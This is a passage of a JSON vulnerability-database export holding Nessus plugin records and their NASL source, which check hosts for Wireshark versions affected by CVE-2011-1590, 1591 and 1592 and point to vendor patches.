\"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"wireshark-1.2.10-1.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-11T16:30:23", "description": "The installed version of Wireshark is 1.2.x less than 1.2.16 or 1.4.x less than 1.4.5. Such versions are affected by the following vulnerabilities :\n - A data type mismatch error exists in the function 'dissect_nfs_clientaddr4' in the file 'packet-nfs.c' of the NFS dissector and could lead to application crashes while decoding 'SETCLIENTID' calls. (5209) \n - A use-after-free error exists in the file 'asn1/x509if/x509if.cnf' of the X.509if dissector that could lead to application crashes. (5754, 5793) \n - An buffer overflow vulnerability exists in the file 'packet-dect.c' of the DECT dissector that could allow arbitrary code execution. (5836)", "cvss3": {"score": null, "vector": null}, "published": "2011-04-18T00:00:00", "type": "nessus", "title": "Wireshark < 1.2.16 / 1.4.5 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591", "CVE-2011-1592"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:wireshark:wireshark"], "id": "WIRESHARK_1_4_5.NASL", "href": "https://www.tenable.com/plugins/nessus/53473", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(53473);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\", \"CVE-2011-1592\");\n script_bugtraq_id(47392);\n script_xref(name:\"EDB-ID\", value:\"17185\");\n script_xref(name:\"EDB-ID\", value:\"18145\");\n script_xref(name:\"Secunia\", value:\"44172\");\n\n script_name(english:\"Wireshark < 1.2.16 / 1.4.5 Multiple Vulnerabilities\");\n script_summary(english:\"Does a version check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains an application that is affected by\nmultiple vulnerabilities.\"\n );\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Wireshark is 1.2.x less than 1.2.16 or 1.4.x\nless than 1.4.5. Such versions are affected by the following\nvulnerabilities :\n \n - A data type mismatch error exists in the function \n 'dissect_nfs_clientaddr4' in the file 'packet-nfs.c' of\n the NFS dissector and could lead to application crashes\n while decoding 'SETCLIENTID' calls. (5209) \n \n - A use-after-free error exists in the file \n 'asn1/x509if/x509if.cnf' of the X.509if dissector that\n could lead to application crashes. (5754, 5793) \n \n - An buffer overflow vulnerability exists in the file\n 'packet-dect.c' of the DECT dissector that could allow\n arbitrary code execution. (5836)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5209\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5754\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5793\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2011-05.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2011-06.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.wireshark.org/docs/relnotes/wireshark-1.2.16.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.wireshark.org/docs/relnotes/wireshark-1.4.5.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Wireshark version 1.2.16 / 1.4.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark packet-dect.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/04/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wireshark:wireshark\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"wireshark_installed.nasl\");\n script_require_keys(\"SMB/Wireshark/Installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each install.\ninstalls = get_kb_list(\"SMB/Wireshark/*\");\nif (isnull(installs)) exit(0, \"The 'SMB/Wireshark/*' KB items are missing.\");\n\ninfo = '';\ninfo2 = '';\n\nforeach install(keys(installs))\n{\n if (\"/Installed\" >< install) continue;\n\n version = install - \"SMB/Wireshark/\";\n\n if (\n version =~ \"^1\\.2($|\\.[0-9]|\\.1[0-5])($|[^0-9])\" || \n version =~ \"^1\\.4($|\\.[0-4])($|[^0-9])\"\n ) \n info +=\n '\\n Path : ' + installs[install] +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.2.16 / 1.4.5\\n';\n else\n info2 += 'Version '+ version + ', under '+ installs[install] + '. ';\n}\n\n# Report if any were found to be vulnerable\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (max_index(split(info)) > 4) s = \"s of Wireshark are\";\n else s = \" of Wireshark is\";\n\n report = \n '\\n' +\n 'The following vulnerable instance' + s + ' installed :\\n' +\n '\\n' + info;\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n exit(0);\n}\nif (info2)\n exit(0, \"The following instance(s) of Wireshark are installed and are not vulnerable : \"+info2);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-11T16:31:20", "description": "This advisory updates wireshark to the latest version (1.2.16), fixing several security issues :\n\nThe X.509if dissector in Wireshark 1.2.x before 1.2.16 and 1.4.x before 1.4.5 does not properly initialize certain global variables, which allows remote attackers to cause a denial of service (application crash) via a crafted .pcap file (CVE-2011-1590).\n\nStack-based buffer overflow in the DECT dissector in epan/dissectors/packet-dect.c in Wireshark 1.4.x before 1.4.5 allows remote attackers to execute arbitrary code via a crafted .pcap file (CVE-2011-1591).\n\nThe NFS dissector in epan/dissectors/packet-nfs.c in Wireshark 1.4.x before 1.4.5 on Windows uses an incorrect integer data type during decoding of SETCLIENTID calls, which allows remote attackers to cause a denial of service (application crash) via a crafted .pcap file (CVE-2011-1592).\n\nThe updated packages have been upgraded to the latest 1.2.x version (1.2.16) which is not vulnerable to these issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-05-13T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : wireshark (MDVSA-2011:083)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591", "CVE-2011-1592"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:dumpcap", "p-cpe:/a:mandriva:linux:lib64wireshark-devel", "p-cpe:/a:mandriva:linux:lib64wireshark0", "p-cpe:/a:mandriva:linux:libwireshark-devel", "p-cpe:/a:mandriva:linux:libwireshark0", "p-cpe:/a:mandriva:linux:rawshark", "p-cpe:/a:mandriva:linux:tshark", "p-cpe:/a:mandriva:linux:wireshark", "p-cpe:/a:mandriva:linux:wireshark-tools", "cpe:/o:mandriva:linux:2010.0", "cpe:/o:mandriva:linux:2010.1"], "id": "MANDRIVA_MDVSA-2011-083.NASL", "href": "https://www.tenable.com/plugins/nessus/53882", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:083. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53882);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\", \"CVE-2011-1592\");\n script_bugtraq_id(47392);\n script_xref(name:\"MDVSA\", value:\"2011:083\");\n\n script_name(english:\"Mandriva Linux Security Advisory : wireshark (MDVSA-2011:083)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This advisory updates wireshark to the latest version (1.2.16), fixing\nseveral security issues :\n\nThe X.509if dissector in Wireshark 1.2.x before 1.2.16 and 1.4.x\nbefore 1.4.5 does not properly initialize certain global variables,\nwhich allows remote attackers to cause a denial of service\n(application crash) via a crafted .pcap file (CVE-2011-1590).\n\nStack-based buffer overflow in the DECT dissector in\nepan/dissectors/packet-dect.c in Wireshark 1.4.x before 1.4.5 allows\nremote attackers to execute arbitrary code via a crafted .pcap file\n(CVE-2011-1591).\n\nThe NFS dissector in epan/dissectors/packet-nfs.c in Wireshark 1.4.x\nbefore 1.4.5 on Windows uses an incorrect integer data type during\ndecoding of SETCLIENTID calls, which allows remote attackers to cause\na denial of service (application crash) via a crafted .pcap file\n(CVE-2011-1592).\n\nThe updated packages have been upgraded to the latest 1.2.x version\n(1.2.16) which is not vulnerable to these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wireshark.org/docs/relnotes/wireshark-1.2.16.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark packet-dect.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dumpcap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wireshark0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libwireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libwireshark0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:rawshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:wireshark-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.0\", reference:\"dumpcap-1.2.16-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64wireshark-devel-1.2.16-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64wireshark0-1.2.16-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libwireshark-devel-1.2.16-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libwireshark0-1.2.16-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"rawshark-1.2.16-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"tshark-1.2.16-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"wireshark-1.2.16-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"wireshark-tools-1.2.16-0.1mdv2010.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.1\", reference:\"dumpcap-1.2.16-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64wireshark-devel-1.2.16-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64wireshark0-1.2.16-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libwireshark-devel-1.2.16-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libwireshark0-1.2.16-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"rawshark-1.2.16-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"tshark-1.2.16-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"wireshark-1.2.16-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"wireshark-tools-1.2.16-0.1mdv2010.2\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-11T16:35:01", "description": "This update to wireshark version 1.4.5 fixes the following security issues :\n\n - Resource Management Errors. (CWE-399, CVE-2011-1590)\n\n - Buffer Errors. (CWE-119, CVE-2011-1591)\n\n - Numeric Errors (CWE-189, CVE-2011-1592)", "cvss3": {"score": null, "vector": null}, "published": "2011-06-08T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : wireshark (ZYPP Patch Number 7501)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591", "CVE-2011-1592"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_WIRESHARK-7501.NASL", "href": "https://www.tenable.com/plugins/nessus/54995", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54995);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\", \"CVE-2011-1592\");\n\n script_name(english:\"SuSE 10 Security Update : wireshark (ZYPP Patch Number 7501)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to wireshark version 1.4.5 fixes the following security\nissues :\n\n - Resource Management Errors. (CWE-399, CVE-2011-1590)\n\n - Buffer Errors. (CWE-119, CVE-2011-1591)\n\n - Numeric Errors (CWE-189, CVE-2011-1592)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1590.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1591.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1592.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7501.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark packet-dect.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"wireshark-1.4.4-0.39.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"wireshark-devel-1.4.4-0.39.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-11T16:34:39", "description": "This update to wireshark version 1.4.5 fixes the following security issues :\n\n - Resource Management Errors. (CWE-399, CVE-2011-1590)\n\n - Buffer Errors. (CWE-119, CVE-2011-1591)\n\n - Numeric Errors (CWE-189, CVE-2011-1592)", "cvss3": {"score": null, "vector": null}, "published": "2011-06-08T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : wireshark (SAT Patch Number 4476)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591", "CVE-2011-1592"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:wireshark", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_WIRESHARK-110503.NASL", "href": "https://www.tenable.com/plugins/nessus/54994", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54994);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\", \"CVE-2011-1592\");\n\n script_name(english:\"SuSE 11.1 Security Update : wireshark (SAT Patch Number 4476)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to wireshark version 1.4.5 fixes the following security\nissues :\n\n - Resource Management Errors. (CWE-399, CVE-2011-1590)\n\n - Buffer Errors. (CWE-119, CVE-2011-1591)\n\n - Numeric Errors (CWE-189, CVE-2011-1592)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=688109\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1590.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1591.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1592.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 4476.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark packet-dect.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"wireshark-1.4.4-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"wireshark-1.4.4-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"wireshark-1.4.4-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-11T14:39:33", "description": "This wireshark update fixes :\n\n - Use of un-initialized variables (CVE-2011-1590)\n\n - Buffer overflow in DECT dissector (CVE-2011-1591)\n\n - Crash in NFS dissector on Windows (CVE-2011-1592)", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : wireshark (openSUSE-SU-2011:0602-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591", "CVE-2011-1592"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:wireshark", "p-cpe:/a:novell:opensuse:wireshark-devel", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_WIRESHARK-110511.NASL", "href": "https://www.tenable.com/plugins/nessus/75773", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update wireshark-4538.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75773);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\", \"CVE-2011-1592\");\n\n script_name(english:\"openSUSE Security Update : wireshark (openSUSE-SU-2011:0602-1)\");\n script_summary(english:\"Check for the wireshark-4538 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This wireshark update fixes :\n\n - Use of un-initialized variables (CVE-2011-1590)\n\n - Buffer overflow in DECT dissector (CVE-2011-1591)\n\n - Crash in NFS dissector on Windows (CVE-2011-1592)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=688109\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 